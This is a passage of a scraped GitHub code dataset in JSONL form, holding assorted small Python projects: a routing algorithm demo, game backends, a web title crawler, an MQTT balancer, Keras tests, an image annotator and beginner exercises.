== '__main__':\n if len(sys.argv) < 2:\n sys.exit()\n with open(sys.argv[1], 'r') as f:\n t = int(f.readline().rstrip())\n x = []\n for l in f:\n l = [float(n) for n in re.split(r\"\\s\", l.rstrip())]\n x.append(l)\n ans = magic(t, x)\n with open(\"{}_output\".format(sys.argv[1]), 'w') as o:\n for a in xrange(t):\n o.write(\"Case #{}: {:.7f}\\n\".format(a + 1, 
ans[a]))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/3234.py","file_name":"3234.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27221287187","text":"from AdjacentMatrix import Graph\n\nMAX_Route = 16\n# MAX Routing Number in RIP Protocol\n\ndef DistanceVector(G):\n #initialize 0 (no link edge) as infinite distance\n cost_matrix = G.matrix\n for i in range(len(cost_matrix)):\n for j in range(len(cost_matrix)):\n if cost_matrix[i][j] == 0 and (i != j):\n cost_matrix[i][j] = MAX_Route\n \n print(\"Before Communicating with Adjacent Router\",cost_matrix)\n \n for vertex in range(len(cost_matrix)):\n # vertex x shares its vector\n connect = GetConnectedNode(cost_matrix[vertex])\n for con in connect:\n cost = cost_matrix[vertex][con]\n updated_cost_matrix_con = Relax(cost_matrix[vertex],cost_matrix[con],cost)\n cost_matrix[con] = updated_cost_matrix_con\n print(\"After Communicating with Adjacent Router\\n\",cost_matrix)\n \ndef Relax(cost_vector1, cost_vector2,cost):\n for i in range(len(cost_vector2)):\n if ((cost_vector1[i] + cost) < cost_vector2[i]):\n cost_vector2[i] = cost_vector1[i] + cost\n return cost_vector2\n\ndef GetConnectedNode(cost_matrix):\n return [num for num, s in enumerate(cost_matrix) if s != MAX_Route]\n\nif __name__ == '__main__':\n G = Graph(7)\n G.AddEdge(0,1)\n G.AddEdge(0,2)\n G.AddEdge(0,4)\n G.AddEdge(0,5)\n G.AddEdge(1,2)\n G.AddEdge(2,3)\n G.AddEdge(3,6)\n G.AddEdge(5,6)\n G.PrintMatrix()\n DistanceVector(G)","repo_name":"chinaoel/DataStructure","sub_path":"C_Data_Structure/Graph/DistanceVector.py","file_name":"DistanceVector.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9593542334","text":"import endpoints\nfrom google.appengine.ext import ndb\nimport msgs\nimport datetime\n\n\nclass User(ndb.Model):\n \"\"\"User profile\"\"\"\n name = ndb.StringProperty(required=True)\n email = ndb.StringProperty()\n\n @classmethod\n def create(cls, username, email=None):\n user = User(name=username, email=email)\n user.put()\n\n @classmethod\n def get_by_name(cls, user_name):\n user = User.query(User.name == user_name).get()\n if not user: raise endpoints.NotFoundException(\"No user found with name {}\".format(user_name))\n return user\n\n def getRank(self):\n \"\"\"return the number of matches and winning details\"\"\"\n from . import BattleShip\n # search only the completed games\n q = BattleShip.query(BattleShip.gameOver == True, BattleShip.cancelled == False)\n matches = q.filter(ndb.OR(BattleShip.leftPlayer == self.key, BattleShip.rightPlayer == self.key)).count()\n wins = q.filter(ndb.OR(BattleShip.winner == self.key)).count()\n return msgs.UserRank(name=self.name, matches=matches, wins=wins)\n\n def hasInactiveGames(self):\n \"\"\"\n return whether the user is part of any inactive games\n Returns:\n bool: true or false\n \"\"\"\n from .
import BattleShip\n q = BattleShip.query(BattleShip.gameOver == False,\n BattleShip.cancelled == False,\n ndb.OR(BattleShip.leftPlayer == self.key, BattleShip.rightPlayer == self.key))\n\n for aGame in q:\n # if any of the user's games has been inactive for more than 1 hour\n if (datetime.datetime.now() - aGame.time_updated) > datetime.timedelta(hours=1):\n return True\n\n return False\n","repo_name":"jnoortheen/battleship_game_api","sub_path":"battleship/models/_user.py","file_name":"_user.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11435928590","text":"import urllib.request #import the urllib.request library\r\nfrom bs4 import BeautifulSoup\r\n\r\ntarget_url = 'http://52.68.130.249:8040/textboard/' #target url\r\n\r\n# function that fetches the titles and list of posts\r\ndef fetch_post_list():\r\n URL = target_url #store the address in URL\r\n res = urllib.request.urlopen(URL)\r\n html = res.read()\r\n\r\n soup = BeautifulSoup(html, 'html.parser')\r\n table = soup.find('table', class_='kingkongboard-table')\r\n\r\n title_list = table.find_all('td', class_='kingkongboard-list-title')\r\n\r\n links = [] #define the list variable links to store the links\r\n\r\n links = [td.find('a').get_text() for td in title_list] #loop over title_list, find each 'a' tag and append its text to links\r\n #this code is equivalent to:\r\n \"\"\"\r\n for td in title_list:\r\n links.append(td.find('a').get_text()['href'])\r\n body_tag.append(bs.find('body'))\r\n\"\"\"\r\n\r\n return links #return the links\r\n\r\nresult = fetch_post_list( ) #call the fetch_post_list() function\r\nprint(result) #print the result\r\n\r\n","repo_name":"PRsH1/C-Python","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37941609683","text":"import json\n\nfrom sqlalchemy.orm import Session\nfrom typing import Dict, List, Tuple, Optional\nimport random\n\nimport game_configs\nimport schemas\nimport utils\nimport utils.utils\nfrom utils import logger, utils\nimport models\nimport crud\n\n\nclass ComputedPlayer:\n def __init__(self, player_id: int, db: Session,\n season: int, date: str,\n player_model: Optional[models.Player] = None):\n self.db = db\n self.player_id = player_id\n self.season = season\n self.date = date\n # to reduce read operations, an existing player_model can be passed in\n self.player_model = player_model \\\n if player_model \\\n else crud.get_player_by_id(db=self.db, player_id=self.player_id)\n self.age = self.player_model.age\n\n # with open(\"./game_configs/data/location_capability.json\", encoding='utf-8') as f_obj:\n # self.location_capability = json.load(f_obj)\n self.location_capability = game_configs.location_capability\n self.capa = dict()\n self.init_capa()\n\n def init_capa(self):\n self.capa['shooting'] = self.player_model.shooting\n self.capa['passing'] = self.player_model.passing\n self.capa['dribbling'] = self.player_model.dribbling\n self.capa['interception'] = self.player_model.interception\n self.capa['pace'] = self.player_model.pace\n self.capa['strength'] = self.player_model.strength\n self.capa['aggression'] = self.player_model.aggression\n self.capa['anticipation'] = self.player_model.anticipation\n self.capa['free_kick'] = self.player_model.free_kick\n self.capa['stamina'] = self.player_model.stamina\n self.capa['goalkeeping'] = self.player_model.goalkeeping\n\n def get_show_data(self) -> schemas.PlayerShow:\n \"\"\"\n Get the player info to return to the front end\n :return: schemas.PlayerShow\n \"\"\"\n data = dict()\n data['id'] = self.player_model.id\n
data['club_id'] = self.player_model.club_id\n data['club_name'] = self.player_model.club.name\n data['name'] = self.player_model.name\n data['translated_name'] = self.player_model.translated_name\n data['translated_nationality'] = self.player_model.translated_nationality\n data['age'] = self.get_age()\n data['height'] = self.player_model.height\n data['weight'] = self.player_model.weight\n data['birth_date'] = self.player_model.birth_date\n data['wages'] = self.player_model.wages\n data['values'] = self.get_values()\n data['number'] = random.randint(1, 50) # TODO shirt number\n data['avatar'] = utils.turn_str2dict(self.player_model.avatar)\n data['real_stamina'] = self.get_real_stamina()\n data['location_num'] = self.get_location_num()\n data['capa'] = self.get_all_capa(is_retain_decimal=True)\n data['top_location'] = self.get_top_lo_n_capa()[0]\n data['superior_location'] = self.get_superior_location()\n data['top_capa'] = self.get_top_lo_n_capa()[1]\n data['location_capa'] = {a[0]: a[1] for a in self.get_sorted_location_capa(True)}\n data['style_tag'] = self.get_style_tag()\n data['talent_tag'] = self.get_talent_tag()\n data['recent_ratings'] = self.get_ratings_in_recent_games()\n data['on_sale'] = self.player_model.on_sale\n return schemas.PlayerShow(**data)\n\n def get_talent_tag(self) -> List[str]:\n \"\"\"\n Compute talent tags from the player's capability upper limits\n \"\"\"\n talent_tag = []\n if self.player_model.goalkeeping_limit > 85:\n talent_tag.append(\"壁垒\")\n if self.player_model.height > 185:\n talent_tag.append(\"高塔\")\n if self.player_model.strength_limit > 85 and self.player_model.aggression_limit > 85:\n talent_tag.append(\"推土机\")\n if self.player_model.pace_limit > 85:\n talent_tag.append(\"猎豹\")\n if self.player_model.dribbling_limit > 85:\n talent_tag.append(\"魔术师\")\n if self.player_model.passing_limit > 85:\n talent_tag.append(\"发动机\")\n if self.player_model.shooting_limit > 85:\n talent_tag.append(\"重炮手\")\n if self.player_model.shooting_limit > 83 and self.player_model.aggression_limit > 83:\n talent_tag.append(\"偷猎者\")\n if self.player_model.stamina_limit > 85:\n talent_tag.append(\"大心脏\")\n if self.player_model.free_kick_limit > 85:\n talent_tag.append(\"任意球大师\")\n if self.player_model.interception_limit > 87:\n talent_tag.append(\"扫荡者\")\n if len(talent_tag) == 0:\n talent_tag.append(\"普通一员\")\n return talent_tag\n\n def get_style_tag(self) -> List[str]:\n \"\"\"\n Compute style tags from the player's current capability values\n \"\"\"\n style_tag = []\n if self.player_model.passing > 50 and self.player_model.interception > 50:\n style_tag.append(\"就地反抢\")\n if self.player_model.pace > 50 and self.player_model.shooting > 50:\n style_tag.append(\"前插攻击\")\n if self.player_model.aggression < 50 and self.player_model.interception > 50:\n style_tag.append(\"防守内收\")\n if self.player_model.aggression > 50:\n style_tag.append(\"高位压迫\")\n if self.player_model.pace > 50 and self.player_model.passing > 50:\n style_tag.append(\"套边传中\")\n if self.player_model.strength > 50 and self.player_model.pace < 40:\n style_tag.append(\"站桩护球\")\n if self.player_model.passing > 60 and self.player_model.anticipation > 60:\n style_tag.append(\"传球组织\")\n if self.player_model.aggression > 50 and self.player_model.anticipation < 50:\n style_tag.append(\"利用身体\")\n if self.player_model.dribbling > 60:\n style_tag.append(\"盘带过人\")\n if self.player_model.shooting > 60:\n style_tag.append(\"远射得分\")\n if len(style_tag) == 0:\n style_tag.append(\"听从指挥\")\n return style_tag\n\n def get_location_num(self) -> Dict[str, int]:\n \"\"\"\n Get the number of matches the player has played at each position\n \"\"\"\n data = dict()\n data['ST_num'] =
self.player_model.ST_num\n data['CM_num'] = self.player_model.CM_num\n data['LW_num'] = self.player_model.LW_num\n data['RW_num'] = self.player_model.RW_num\n data['CB_num'] = self.player_model.CB_num\n data['LB_num'] = self.player_model.LB_num\n data['RB_num'] = self.player_model.RB_num\n data['GK_num'] = self.player_model.GK_num\n data['CAM_num'] = self.player_model.CAM_num\n data['LM_num'] = self.player_model.LM_num\n data['RM_num'] = self.player_model.RM_num\n data['CDM_num'] = self.player_model.CDM_num\n return data\n\n def get_all_capa(self, is_retain_decimal: bool = False) -> dict:\n \"\"\"\n Get all capability values\n :return: dict of capability values\n :param is_retain_decimal: whether to keep decimals\n \"\"\"\n data = dict()\n data['shooting'] = self.get_capa('shooting')\n data['passing'] = self.get_capa('passing')\n data['dribbling'] = self.get_capa('dribbling')\n data['interception'] = self.get_capa('interception')\n data['pace'] = self.get_capa('pace')\n data['strength'] = self.get_capa('strength')\n data['aggression'] = self.get_capa('aggression')\n data['anticipation'] = self.get_capa('anticipation')\n data['free_kick'] = self.get_capa('free_kick')\n data['stamina'] = self.get_capa('stamina') # note: this is the stamina 'capability', not the actual stamina!\n data['goalkeeping'] = self.get_capa('goalkeeping')\n if is_retain_decimal:\n return {k: float(utils.retain_decimal(v)) for k, v in data.items()}\n return data\n\n def get_capa(self, capa_name: str, is_retain_decimal: bool = False,\n is_filtered_by_stamina: bool = False) -> float:\n \"\"\"\n Get the capability value after the age filter is applied\n :param capa_name: capability name\n :param is_retain_decimal: whether to keep decimals\n :param is_filtered_by_stamina: whether to factor in stamina; used only in the AI squad-selection strategy\n :return: capability value\n \"\"\"\n ori_capa = self.capa[capa_name]\n age = self.get_age()\n start_age = 30\n if age >= start_age:\n weight = 1 - (age - 30 + 1) * 0.05\n if weight <= 0:\n weight = 0.05\n else:\n weight = 1\n if is_retain_decimal:\n return float(utils.retain_decimal(ori_capa * weight))\n return ori_capa * weight\n\n def get_location_capa(self, lo_name: str, is_retain_decimal: bool = False) -> float:\n \"\"\"\n Get the player's overall capability at the given position\n :param lo_name: position name\n :return: position capability value\n :param is_retain_decimal: whether to keep decimals\n \"\"\"\n weight_dict = dict()\n for lo in self.location_capability:\n # get the capability weights of the given position\n if lo['name'] == lo_name:\n weight_dict = lo['weight']\n break\n location_capa = 0\n if not weight_dict:\n logger.error('No matching position found!')\n for capa_name, weight in weight_dict.items():\n location_capa += self.get_capa(capa_name) * weight\n if is_retain_decimal:\n return float(utils.retain_decimal(location_capa))\n return location_capa\n\n def get_sorted_location_capa(self, is_retain_decimal: bool = False) -> List[List]:\n \"\"\"\n Get a list of per-position capabilities in descending order\n :return: List[List[lo_name, lo_capa]]\n :param is_retain_decimal: whether to keep decimals\n \"\"\"\n location_capa = []\n if is_retain_decimal:\n for location in self.location_capability:\n location_capa.append(\n [location['name'], self.get_location_capa(location['name'], True)]\n )\n else:\n for location in self.location_capability:\n location_capa.append(\n [location['name'], self.get_location_capa(location['name'])]\n )\n location_capa = sorted(location_capa, key=lambda x: -x[1])\n return location_capa\n\n def get_top_lo_n_capa(self, is_retain_decimal: bool = False) -> Tuple[str, float]:\n \"\"\"\n Get the best position and the overall capability at that position\n :return: (position name, capability value)\n :param is_retain_decimal: whether to keep decimals\n \"\"\"\n lo_name, top_capa = self.get_sorted_location_capa()[0]\n if is_retain_decimal:\n top_capa = float(utils.retain_decimal(top_capa))\n return lo_name, top_capa\n\n def get_ratings_in_recent_games(self, game_num: int =
5) -> List[float]:\n \"\"\"\n Get the rating list of the last n games, ordered from oldest to newest\n :param game_num: number of games to fetch\n \"\"\"\n game_player_data: List[models.GamePlayerData] = self.get_game_player_data(\n start_season=self.season, end_season=self.season)\n if not game_player_data:\n return []\n game_player_data_sorted = sorted(game_player_data, key=lambda x: x.id, reverse=True)\n ratings = [x.final_rating for x in game_player_data_sorted]\n return ratings[:game_num][::-1] if len(ratings) >= game_num else ratings[::-1]\n\n def get_avg_rating_in_recent_year(self) -> float:\n \"\"\"\n Get the average rating over the past year's games\n \"\"\"\n start_season = self.season - 1 if self.season - 1 != 0 else self.season\n game_player_data: List[models.GamePlayerData] = self.get_game_player_data(\n start_season=start_season, end_season=self.season)\n if not game_player_data:\n return 6.0\n rating = float(\n utils.retain_decimal(sum([p.real_rating for p in game_player_data]) / len(game_player_data)))\n rating = rating if rating <= 10 else 10\n return rating\n\n def get_real_stamina(self) -> int:\n \"\"\"\n Get the actual stamina value\n \"\"\"\n if not self.player_model.last_game_date:\n return 100\n last_stamina = self.player_model.real_stamina\n days: int = (utils.Date(self.date).date - utils.Date(\n self.player_model.last_game_date).date).days\n re = int(days * 3 + last_stamina) if int(days * 3 + last_stamina) <= 100 else 100\n return re\n\n def get_age(self) -> int:\n \"\"\"\n Get the age\n :return: age\n \"\"\"\n if self.season:\n return self.age + self.season - 1\n else:\n return self.age + self.player_model.club.league.save.season - 1\n\n def get_game_player_data(self, start_season: int = None, end_season: int = None) \\\n -> List[models.GamePlayerData]:\n \"\"\"\n Get the player's match data for the given seasons\n :param start_season: starting season; defaults to 1 if empty\n :param end_season: ending season; defaults to the current season if empty\n \"\"\"\n s_season = start_season if start_season else 1\n e_season = end_season if end_season else self.season\n game_player_data: List[models.GamePlayerData] = [\n game_data for game_data in self.player_model.game_data if \\\n s_season <= int(game_data.season) <= e_season]\n\n return game_player_data\n\n def get_total_game_player_data(self, start_season: int = None,\n end_season: int = None) -> schemas.TotalGamePlayerDataShow:\n \"\"\"\n Get the player's aggregated match data for the given seasons\n :param start_season: starting season; defaults to 1 if empty\n :param end_season: ending season; defaults to the current season if empty\n \"\"\"\n game_player_data: List[models.GamePlayerData] = self.get_game_player_data(\n start_season=start_season, end_season=end_season)\n if not game_player_data:\n return schemas.TotalGamePlayerDataShow()\n result = dict()\n result['id'] = self.player_id\n result['appearance'] = len(game_player_data)\n result[\"final_rating\"] = float(\n utils.retain_decimal(sum([p.final_rating for p in game_player_data]) / len(game_player_data)))\n result['actions'] = sum([p.actions for p in game_player_data])\n result['shots'] = sum([p.shots for p in game_player_data])\n result['goals'] = sum([p.goals for p in game_player_data])\n result['assists'] = sum([p.assists for p in game_player_data])\n result['passes'] = sum([p.passes for p in game_player_data])\n result['pass_success'] = sum([p.pass_success for p in game_player_data])\n result['dribbles'] = sum([p.dribbles for p in game_player_data])\n result['dribble_success'] = sum([p.dribble_success for p in game_player_data])\n result['tackles'] = sum([p.tackles for p in game_player_data])\n result['tackle_success'] = sum([p.tackle_success for p in game_player_data])\n result['aerials'] = sum([p.aerials for p in game_player_data])\n result['aerial_success'] = sum([p.aerial_success for
p in game_player_data])\n result['saves'] = sum([p.saves for p in game_player_data])\n result['save_success'] = sum([p.save_success for p in game_player_data])\n return schemas.TotalGamePlayerDataShow(**result)\n\n def get_values(self) -> int:\n \"\"\"\n Get the market value\n \"\"\"\n top_capa = self.get_top_lo_n_capa()[1]\n basic_values = top_capa ** 3 / 70.0\n avg_rating = self.get_avg_rating_in_recent_year()\n extra_values = avg_rating * 2000 - 12000\n real_values = int(basic_values + extra_values)\n if real_values < 10:\n real_values = 10\n return real_values\n\n def get_superior_location(self) -> List[str]:\n \"\"\"\n Get the player's strong positions\n For now the strategy is to return the top three positions by capability\n TODO improve the algorithm\n \"\"\"\n return [x[0] for x in self.get_sorted_location_capa()[:3]]\n","repo_name":"Owivi-Breaker/backend","sub_path":"modules/computed_data_app/computed_player.py","file_name":"computed_player.py","file_ext":"py","file_size_in_byte":16187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"41558258064","text":"import asyncio\nimport time\nimport json\nimport gmqtt\n\nfrom utils.utils import run_event_loop, STOP, init_client\nfrom utils.consts import BALANCER_TOPIC, WORKER_REGISTRATION_TOPIC, WORKER_REGISTRED_TOPIC, \\\n WORKER_UNREGISTER_TOPIC, BALANCER_WORKER_TOPIC\nfrom utils.worker import WorkersStorageItem, WorkersStorage\n\n\nmessages_queue = asyncio.Queue()\nworkers_storage = WorkersStorage()\n\n\nasync def on_message(client, topic, payload, qos, properties):\n if topic == BALANCER_TOPIC:\n messages_queue.put_nowait(payload)\n return 0\n\n print('Balancer. Message.', f\"Topic: '{topic}'.\", 'Payload:', payload)\n worker_hex = payload.decode('utf-8')\n if topic == WORKER_REGISTRATION_TOPIC: \n worker = workers_storage.add(worker_hex)\n data = {\"worker_num\": worker.number, \"worker_hex\": worker.worker_hex}\n client.publish(WORKER_REGISTRED_TOPIC, json.dumps(data))\n elif topic == WORKER_UNREGISTER_TOPIC:\n workers_storage.delete(worker_hex)\n return 0\n\n\nasync def send_messages(client):\n \"\"\"\n Balance messages between workers\n \"\"\"\n while True:\n if STOP.is_set():\n break\n\n payload = await messages_queue.get()\n worker = await workers_storage.next_worker()\n client.publish(worker.balancer_topic, payload, qos=1)\n print('Balancer.
Publish.', f\"Topic: '{worker.balancer_topic}'.\", 'Payload', payload)\n messages_queue.task_done()\n\n\nasync def main(broker_host, token):\n client = gmqtt.Client(\"balancer\")\n client = await init_client(client, broker_host, token, on_message=on_message)\n client.subscribe(BALANCER_TOPIC, qos=1)\n client.subscribe(WORKER_REGISTRATION_TOPIC, qos=1)\n client.subscribe(WORKER_UNREGISTER_TOPIC, qos=1)\n asyncio.ensure_future(send_messages(client))\n \n await STOP.wait()\n await client.disconnect()\n\n\nif __name__ == '__main__':\n run_event_loop(main)\n","repo_name":"bondardima42/balancer","sub_path":"balancer.py","file_name":"balancer.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13395655456","text":"import collections\nd={}\nnum=1\nwhile True:\n try:\n item=input(\"\").upper()\n if item in d:\n d[item]=num+1\n continue\n else:\n d[item]=num\n continue\n\n except EOFError:\n od = collections.OrderedDict(sorted(d.items()))\n for a,b in od.items() :\n print(b,a)\n break\n except KeyError:\n continue","repo_name":"AhmedAbdElFatahMohamed/CS50P","sub_path":"CS50P/problem set3 (exceptions)/grocery/grocery.py","file_name":"grocery.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9571782925","text":"p1=input()\n#p1 = P.rstrip('\\r\\n')\np2=p1.split(\". \")\np3=\"\"\nn=0\nfor val in p2:\n f=val[:1].upper()\n f=f+ val[1:]\n \n if (n==0):\n p3=f\n else:\n p3=p3 + \". \" + f\n \n n=n+1\nprint(p3)\n","repo_name":"shilpasayura/algohack","sub_path":"code-basic/7_strings.py","file_name":"7_strings.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"zh","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"33759969588","text":"import turtle#海龟绘图,快捷使用代换 as t\r\nimport random\r\nimport time\r\ndef drawpicture():\r\n turtle.colormode(255)\r\n turtle.screensize(600,600,\"gray\")#宽高,背���色\r\n turtle.pensize(10)\r\n turtle.pencolor(random_color())\r\n turtle.fillcolor(random_color())\r\n turtle.speed(3)\r\n turtle.begin_fill()\r\n for _ in range(5):\r\n turtle.forward(200)\r\n turtle.right(144)\r\n turtle.end_fill()\r\n time.sleep(2)\r\n \r\n turtle.penup()\r\n turtle.goto(-150,-120)\r\n turtle.color(\"violet\")\r\n turtle.write(\"Done\", font=('Arial', 40, 'normal'))\r\n \r\n turtle.mainloop()\r\n \r\n \r\n \r\n# 获取随机颜色\r\ndef random_color():\r\n R = random.randrange(255)\r\n G = random.randrange(255)\r\n B = random.randrange(255)\r\n return (R, G, B)","repo_name":"code-killerr/python_practise","sub_path":"Django/HelloWorld/HelloWorld/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33878431869","text":"import numpy as np\nimport pytest\n\nfrom keras.models import Sequential\nfrom keras.engine.training import weighted_objective\nfrom keras.layers.core import TimeDistributedDense, Masking\nfrom keras import objectives\nfrom keras import backend as K\n\n\ndef test_masking():\n np.random.seed(1337)\n X = np.array([[[1], [1]],\n [[0], [0]]])\n model = Sequential()\n model.add(Masking(mask_value=0, input_shape=(2, 1)))\n model.add(TimeDistributedDense(1, init='one'))\n model.compile(loss='mse', optimizer='sgd')\n y = np.array([[[1], [1]],\n [[1], [1]]])\n loss = model.train_on_batch(X, y)\n assert loss == 0\n\n\ndef 
test_loss_masking():\n weighted_loss = weighted_objective(objectives.get('mae'))\n shape = (3, 4, 2)\n X = np.arange(24).reshape(shape)\n Y = 2 * X\n\n # Normally the trailing 1 is added by standardize_weights\n weights = np.ones((3,))\n mask = np.ones((3, 4))\n mask[1, 0] = 0\n\n out = K.eval(weighted_loss(K.variable(X),\n K.variable(Y),\n K.variable(weights),\n K.variable(mask)))\n\n\nif __name__ == '__main__':\n pytest.main([__file__])\n","repo_name":"tykimos/tykimos.github.io","sub_path":"tests/test_loss_masking.py","file_name":"test_loss_masking.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"9365201559","text":"#\n# @lc app=leetcode.cn id=766 lang=python3\n#\n# [766] Toeplitz Matrix\n#\n\n# @lc code=start\nfrom collections import deque\nclass Solution:\n def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool:\n queue = deque(matrix[0])\n for r in range(1, len(matrix)):\n queue.pop()\n queue.append(matrix[r][0])\n for c in range(1,len(matrix[r])):\n if queue.popleft() != matrix[r][c]:\n return False\n queue.append(matrix[r][c])\n \n return True\n\n# @lc code=end\n\n","repo_name":"mqinbin/python_leetcode","sub_path":"766.托普利茨矩阵.py","file_name":"766.托普利茨矩阵.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11418064423","text":"# python3 -m annotator.annotator\n\nimport cv2\nfrom annotator.panoptic_segmenter import PanopticSegmenter\nfrom annotator.exif import MetaDataManager\nfrom PIL import Image\nimport torch\nimport sys\n\n\nclass Annotator(object):\n\n def __init__(self, *args):\n super(Annotator, self).__init__(*args)\n self.panopticSegmenter = PanopticSegmenter()\n\n def getAnnotationData(self, imgPath):\n return self._makeAnnotation(imgPath)\n\n def annotate(self, imgPath):\n referenceImage = MetaDataManager.read(imgPath)\n isImageAnnotated = referenceImage.doesKeyExist(\n 'segmentData') and referenceImage.doesKeyExist('labelData')\n if not isImageAnnotated:\n annotation = self._makeAnnotation(imgPath)\n referenceImage.put(annotation)\n return True\n return False\n\n def _makeAnnotation(self, imgPath):\n targetImage = cv2.imread(imgPath)\n targetImage = cv2.cvtColor(targetImage, cv2.COLOR_BGR2RGB)\n segments = self.panopticSegmenter.predict_segments(targetImage)\n segmentMatrix = segments[0]\n segmentLabels = segments[1]\n self.segmentMetaData = self.panopticSegmenter.meta_data\n self.labelData = self.getCategoryLabelNames(segmentLabels)\n self.segmentData = self.exportToCSV(segmentMatrix)\n return {\n 'segmentData': self.segmentData,\n 'labelData': self.labelData,\n 'dimensions': {\n 'height': segmentMatrix.size()[0],\n 'width': segmentMatrix.size()[1],\n }\n }\n\n def getCategoryLabelNames(self, segmentLabels):\n res = []\n for rawSegmentLabel in segmentLabels:\n segmentId = rawSegmentLabel['category_id']\n if rawSegmentLabel['isthing']:\n label = self.segmentMetaData.thing_classes[segmentId]\n else:\n label = self.segmentMetaData.stuff_classes[segmentId]\n res.append({'category_id': segmentId,\n 'category_label': label})\n return res\n\n def exportToCSV(self, mat: torch.tensor):\n return ','.join(','.join('%d' % x for x in y) for y in mat)\n\n def isAnnotated(self):\n raise
NotImplementedError()\n","repo_name":"parthraghav/Touch-View","sub_path":"annotator/annotator.py","file_name":"annotator.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"33627764153","text":"from config import *\nimport sqlite3\nfrom flask import g\n\nDATABASE = './static/sp_config.db'\n\ndef connect_db():\n return sqlite3.connect('static/sp_config.db')\n\ndef delete_db(app):\n\n # Insert tuple with config data into database\n with app.app_context():\n conn = connect_db()\n c = conn.cursor()\n c.execute(\"DELETE FROM sp_config\")\n conn.commit()\n conn.close()\n\ndef load_db(app):\n \n spectro_pointer_config = {}\n # Create empty list for appending every value\n config_data = list()\n\n spectro_pointer_config['use_raspberry'] = int(USE_RASPBERRY)\n config_data.append(spectro_pointer_config['use_raspberry'])\n\n spectro_pointer_config['correct_vertical_camera'] = int(CORRECT_VERTICAL_CAMERA)\n config_data.append(spectro_pointer_config['correct_vertical_camera'])\n\n spectro_pointer_config['correct_horizontal_camera'] = int(CORRECT_HORIZONTAL_CAMERA)\n config_data.append(spectro_pointer_config['correct_horizontal_camera'])\n\n spectro_pointer_config['center_radius'] = int(CENTER_RADIUS)\n config_data.append(spectro_pointer_config['center_radius'])\n\n spectro_pointer_config['show_center_circle'] = int(SHOW_CENTER_CIRCLE)\n config_data.append(spectro_pointer_config['show_center_circle'])\n\n spectro_pointer_config['enable_photo'] = int(ENABLE_PHOTO)\n config_data.append(spectro_pointer_config['enable_photo'])\n\n spectro_pointer_config['enable_video'] = int(ENABLE_VIDEO)\n config_data.append(spectro_pointer_config['enable_video'])\n\n spectro_pointer_config['record_seconds'] = int(RECORD_SECONDS)\n config_data.append(spectro_pointer_config['record_seconds'])\n\n spectro_pointer_config['threshold'] = int(THRESHOLD)\n config_data.append(spectro_pointer_config['threshold'])\n\n spectro_pointer_config['resolution'] = str(RESOLUTION)\n config_data.append(spectro_pointer_config['resolution'])\n\n spectro_pointer_config['framerate'] = int(FRAMERATE)\n config_data.append(spectro_pointer_config['framerate'])\n\n spectro_pointer_config['sensor_mode'] = int(SENSOR_MODE)\n config_data.append(spectro_pointer_config['sensor_mode'])\n\n spectro_pointer_config['shutter_speed'] = int(SHUTTER_SPEED)\n config_data.append(spectro_pointer_config['shutter_speed'])\n\n spectro_pointer_config['iso'] = int(ISO)\n config_data.append(spectro_pointer_config['iso'])\n\n # Transform config_data list into a tuple\n config_data = tuple(config_data)\n\n # Insert tuple with config data into database\n with app.app_context():\n conn = connect_db()\n c = conn.cursor()\n c.execute(\"INSERT INTO sp_config VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?)\", config_data)\n conn.commit()\n conn.close()\n\ndef init_db(app):\n conn = connect_db()\n c = conn.cursor()\n try:\n c.execute('''create table sp_config (USE_RASPBERRY int, CORRECT_VERTICAL_CAMERA int,\n CORRECT_HORIZONTAL_CAMERA int, CENTER_RADIUS int,\n SHOW_CENTER_CIRCLE int, ENABLE_PHOTO int,\n ENABLE_VIDEO int,RECORD_SECONDS int, THRESHOLD int,\n RESOLUTION text, FRAMERATE int, SENSOR_MODE int,\n SHUTTER_SPEED int, ISO int)''') \n load_db(app)\n\n except sqlite3.OperationalError as e:\n print('table sp_config already exists' in str(e))\n conn.commit()\n conn.close()\n\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = 
